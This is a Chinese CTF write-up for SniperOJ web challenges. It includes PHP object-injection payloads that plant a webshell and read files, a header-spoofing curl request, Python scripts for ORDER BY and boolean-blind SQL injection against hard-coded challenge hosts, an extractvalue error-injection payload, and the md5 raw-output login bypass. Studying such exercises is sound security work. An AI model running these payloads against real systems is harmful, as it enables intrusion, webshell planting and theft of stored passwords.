SniperOJ web

好久没看web

php-object-injection

题目提示 “Fuck, the powerline was suddenly cut off last night.” —— 编辑器被异常中断时 Vim 会把交换文件留在原地,所以猜测 webroot 下残留着 `.index.php.swp`。直接访问即可下载到 index.php.swp;按 Vim 的命名规则把它改回 `.index.php.swp`,再用 `vim -r` 恢复出源码:

# Recover the source from the leaked swap file.  Vim only recognises the
# dot-prefixed swap name, and it needs an (empty) index.php to attach the
# recovery to.
mv index.php.swp .index.php.swp && touch index.php
vim -r index.php

得到的源码声明了一个类

<?php
// Leaked via the .index.php.swp swap file.  Judging by the "/tmp/natas26_"
// prefix it is lifted from OverTheWire Natas 26.  Every field is
// attacker-controlled once an instance is rebuilt by unserialize(), and
// __destruct() then writes $exitMsg into $logFile: an arbitrary-file-write
// gadget that becomes code execution when $logFile points inside the web root.
class Logger{
private $logFile;
private $initMsg;
private $exitMsg;
// Only the constructor derives $logFile from $file; unserialize() never
// runs it, so the "/tmp/natas26_" prefix does not constrain a payload.
function __construct($file){
// initialise variables
$this->initMsg="#--session started--#\n";
$this->exitMsg="#--session end--#\n";
$this->logFile = "/tmp/natas26_" . $file . ".log";
// write initial message
$fd=fopen($this->logFile,"a+");
// Bug in the original: $initMsg is an undefined local, not
// $this->initMsg, so nothing is actually written here.
fwrite($fd,$initMsg);
fclose($fd);
}
function log($msg){
$fd=fopen($this->logFile,"a+");
fwrite($fd,$msg."\n");
fclose($fd);
}
// Gadget sink: runs on destruction with the deserialized $logFile/$exitMsg,
// and "a+" creates the target file if it does not exist yet.
function __destruct(){
// write exit message
$fd=fopen($this->logFile,"a+");
fwrite($fd,$this->exitMsg);
fclose($fd);
}
}

构造序列化对象:把 logFile 指向 web 目录下的一个 .php 文件、exitMsg 放 PHP 代码,服务端反序列化后对象析构时 __destruct 会把 exitMsg 写进 logFile,于是得到一个可直接访问的 webshell(进而命令执行)。注意 private 属性序列化后属性名两侧带 \0,所以先 base64 再 urlencode:

<?php
// Minimal stand-in for the leaked class: only the two fields the
// __destruct() sink reads are declared.  Property names and visibility
// must match the target exactly (private props serialize as
// "\0Logger\0name", which is also why the blob is base64'd before it is
// urlencoded).  $file is accepted for signature parity and ignored.
class Logger{
    private $logFile;
    private $exitMsg;
    function __construct($file){
        // The "log" lands at a web-reachable path and is served as PHP.
        $this->exitMsg = "<?php echo `cat ../* | grep \"SniperOJ\"`;?>";
        $this->logFile = "img/666.php";
    }
}
// base64 first: the serialized blob carries NUL bytes from the private
// property names and has to survive the round-trip as plain text.
$blob = serialize(new Logger('vsane'));
echo urlencode(base64_encode($blob));
?>

guess the code

很坑,一开始并没有找到源码泄露,后来发现在右键查看源码翻到最下面会看到

#try to read flag.php
// Leaked at the bottom of the page source.  The class declares no $source
// property, so after unserialize() it is whatever the attacker put in the
// payload, and __toString() hands it to highlight_file(): an arbitrary
// file read that fires as soon as the object is used as a string (echo,
// concatenation, string comparison).
Class whatthefuck{
public function __toString()
{
return highlight_file($this->source,true);
}
}

cookie的值做如下处理,发现传入的值被放入了数组

<?php
// Decode the cookie the way the server does, to learn the shape it
// expects: a PHP array holding one string element ("111111").
$cookie = "a%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22111111%22%3B%7D";
$decoded = unserialize(urldecode($cookie));
print_r($decoded);
?>

于是把 whatthefuck 对象塞进同样的数组结构里,让服务端反序列化后拼接/输出 cookie 值时触发 __toString,读出 flag.php。构造如下:

<?php
// Local copy of the leaked class so serialize() emits the right class
// name; only __toString() matters and its behaviour is kept identical.
Class whatthefuck{
    public function __toString()
    {
        $html = highlight_file($this->source, true);
        return $html;
    }
}
// Build the cookie: the server unserialize()s an array, so the gadget is
// wrapped in one.  Assigning $source creates it as a dynamic property,
// exactly as unserialize() will do on the target.
$gadget = new whatthefuck();
$gadget->source = "flag.php";
echo urlencode(serialize([$gadget]));
?>

SniperOJ-Web-Browser

# All three "browser" checks in one request: spoofed client IP, fixed source
# port, and the User-Agent string (keep the "Broswer" spelling as written --
# presumably that is what the server matches).
curl -H "x-forwarded-for:127.0.0.1" \
     --local-port 23333 \
     -A "SniperOJ-Web-Broswer" \
     "http://web2.sniperoj.cn:10005/"

inject-again

按照提示访问http://120.24.215.80:10004/?username=1&password=1得到
Flag is the password of admin!,大概就是注入获得密码
尝试访问 http://120.24.215.80:10004/?username=%27%20or%201%23&password=1,页面返回 admin,说明 username 处存在注入且有回显(可以 union);简单 fuzz 后发现过滤了 ; ( ) = 这几个字符,所以常规的 substr()/ascii() 比较用不了。
QQ截图20170804120242.jpg-22.3kB
尝试union查询表中列数,发现有3列,username在第二列,password在第三列
参考链接:SQL注入之骚姿势小记
参考order by之骚,利用条件是有对应注入出数据同一行的其他字段的回显
123.jpg-23.1kB
456.jpg-25.7kB
所以可知password的第一个字符为4,爆破

#!/usr/bin/env python
import requests
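url = "http://120.24.215.80:10004/"


def brute_password(target_url=url, max_len=50, oracle=None):
    """Recover admin's password one character at a time via the ORDER BY trick.

    The injected row ``(1, 2, guess)`` is sorted against admin's real row on
    column 3 and the page shows the first row, so seeing "admin" means
    ``password < guess``.  Walking ``guess`` upward from chr(48), the first
    hit identifies the true character as ``chr(j - 1)``.  ``(`` ``)`` and
    ``=`` are filtered by the target, which is why no substr/ascii is used.

    Args:
        target_url: endpoint taking ``username``/``password`` query params.
        max_len: upper bound on the password length to recover.
        oracle: ``callable(guess) -> bool`` returning True when the server
            reports ``password < guess``; defaults to an HTTP probe against
            ``target_url``.  Injectable for offline testing.

    Returns:
        The recovered password (a prefix of it if ``max_len`` was hit).
    """
    if oracle is None:
        def oracle(guess):
            payload = "admin' union select 1,2,'%s' order by 3#" % guess
            params = {"username": payload, "password": "1"}
            r = requests.get(target_url, params=params)
            # r.text, not r.content: content is bytes on Python 3 and the
            # substring test would raise TypeError.
            # NOTE(review): a bare "admin" substring is a coarse oracle --
            # confirm the page never echoes "admin" for the injected row.
            return "admin" in r.text

    flag = ""
    for _ in range(max_len):
        hit = None
        for j in range(48, 127):
            if oracle(flag + chr(j)):
                hit = j
                break
        # A hit at j == 48 means the prefix already equals the password (or
        # the next char is below '0'); no hit means it is above '~'.  Either
        # way nothing more can be recovered, so stop instead of appending
        # junk for the remaining iterations.
        if hit is None or hit == 48:
            break
        flag += chr(hit - 1)
        print(flag)
    return flag


if __name__ == "__main__":
    brute_password()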

very-hard-injection

参考:mysql多表update更新的几种方法
关于一个sql注入注入题目的思考

<?php
$link = mysqli_connect('localhost', 'root', 'root');
mysqli_select_db($link, 'code');
// addslashes() escapes ' " \ and NUL only -- the backtick that delimits the
// identifier below is untouched, so $table can close it and inject SQL
// between `table` and SET.  Because the statement spans several lines, a
// # or -- comment cannot swallow the rest; the payload must keep the
// statement syntactically whole.  (Identifiers cannot be bound with a
// prepared statement; the fix is an allow-list of table names.)
$table = addslashes($_GET['table']);
$sql = "UPDATE `{$table}`
SET `username`='admin'
WHERE id=1";
// The raw error is echoed back, which is what makes error-based
// extraction (extractvalue) possible.
if(!mysqli_query($link, $sql)) {
echo(mysqli_error($link));
}
mysqli_close($link);

经过了 addslashes 处理,输入里不能出现单引号、双引号、反斜线(都会被转义),但反引号不在其列,所以可以闭合 `{$table}` 两侧的反引号;另外 SQL 语句分了多行,单行注释(# 或 -- )只能吃掉本行,无法把后面的 SET/WHERE 注释掉,payload 必须保证整条语句语法完整。看了 dalao 的思路:闭合反引号后给表起别名,left join 一个子查询(虚表),在它的 WHERE 里用 extractvalue 报错把数据带出来。构造如下 SQL 语句:

-- Drops into UPDATE `{$table}` ...: closes the identifier after "users",
-- aliases the table as t, LEFT JOINs a derived table whose WHERE raises an
-- XPath error carrying user(); the trailing unmatched backtick pairs with
-- the template's closing one so the statement still parses.  No quotes or
-- backslashes anywhere (addslashes), hence char(97) for the literal and hex
-- 0x7e for the "~" markers.  Note that extractvalue() truncates the
-- reported value to 32 characters; use substring() for longer data.
users` t left join (select char(97) as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=`t.username

php-weak-type

// Evaluates to true: both digests have the form "0e" followed only by
// digits, so the loose == compares them as numeric strings (0 == 0).
// Compare hashes with === or hash_equals() to avoid this.
md5('240610708') == md5('QNKCDZO')

2048

git泄露,Git隐藏flag的新姿势,dalao写的很详细
QQ截图20170804162834.jpg-34.9kB

md5-vs-injection

当后台处理程序类似于下面的语句时,存在md5注入

// md5(..., true) returns 16 raw bytes; splicing them straight into the
// query means any digest containing a quote byte breaks out of the string
// literal.  Fix: bind the value with a prepared statement (or use the hex
// form, md5($password) without the raw flag).
$sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'";

md5($string, $raw) 的参数:
string —— 必需,要计算摘要的字符串;
raw —— 可选,输出格式。TRUE 返回 16 字节的原始二进制摘要;FALSE(默认)返回 32 位十六进制字符串。

ffifdyop 的 md5 为 276f722736c95d99e921722cf9ed621c,以 raw 模式输出时开头几个字节 27 6f 72 27 36 正好是 'or'6,后面是乱码,于是查询变成 pass = ''or'6<trash>';'6…' 在 MySQL 的布尔上下文里按数值 6 处理为真,WHERE 恒真,直接绕过登录。

as fast as you can

import requests
import base64
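# One Session so both requests carry the same PHPSESSID.
# NOTE(review): the cookie value was pasted from a browser; replace it with
# your own, or drop the set() and let the first GET establish the session.
target = "http://202.118.236.191:10003/"
sess = requests.Session()
sess.cookies.set("PHPSESSID", "u6f6tl2hkeitoeb8rv2dt863u5")
r = sess.get(target)
# The server hands out a base64 token in the Get-flag response header that
# has to be posted back before it expires ("as fast as you can").
token_b64 = r.headers.get("Get-flag")
if token_b64 is None:
    raise SystemExit("no Get-flag header in response (wrong cookie/session?)")
# Decode to str: on Python 3 "%s" % bytes would submit "b'...'" verbatim.
token = base64.b64decode(token_b64).decode()
r = sess.post(target, data={"SniperOJ": token})
print(r.text)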

图书管理系统

#!/usr/bin/env python
import requests
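dic = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_{}'
url = 'http://202.118.236.191:10009/src/API/login.php'

# Recon chain that led to the final subquery; each was run in turn through
# the same loop.  /*!from*/ is a MySQL version comment, used here to get the
# keyword past a filter on the bare word "from".
#   (select database())
#   (select group_concat(table_name) /*!from*/ information_schema.tables
#       where table_schema=database())
#   (select group_concat(column_name) /*!from*/ information_schema.columns
#       where table_name=0x666c6167)          -- 0x666c6167 == 'flag'
QUERY = "(select fl4g /*!from*/ flag)"


def blind_extract(query=QUERY, charset=dic, max_len=39, oracle=None):
    """Boolean-blind extraction of ``query``'s result, one character per position.

    For position ``i`` and candidate ``c`` the injected condition is
    ``ascii(substring(query, i, 1)) = ord(c)``; ``oracle`` reports whether the
    server answered "true".  Extraction stops at the first position where no
    candidate matches (end of the value, or a character outside ``charset``),
    instead of probing every remaining position for nothing.

    Args:
        query: parenthesised SQL subquery whose single value is read out.
        charset: candidate characters, tried in this order.
        max_len: maximum number of positions to probe.
        oracle: ``callable(username_payload) -> bool``; defaults to an HTTP
            probe that treats a 28-byte response body as "true".

    Returns:
        The recovered string.
    """
    if oracle is None:
        def oracle(payload):
            data = {'username': payload,
                    'password': 'vsane',
                    'submit': '%E6%8F%90%E4%BA%A4'}
            s = requests.post(url=url, data=data)
            # NOTE(review): the 28-byte "true" body length was measured by
            # hand; re-measure if the login page changes.
            return len(s.text) == 28

    flag = ''
    for i in range(1, max_len + 1):
        for c in charset:
            payload = ("vsane' or ascii(substring(%s,'%d',1))='%d'#"
                       % (query, i, ord(c)))
            if oracle(payload):
                flag += c
                print(flag)
                break
        else:
            # no candidate matched at this position: nothing more to read
            break
    return flag


if __name__ == '__main__':
    print(blind_extract())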

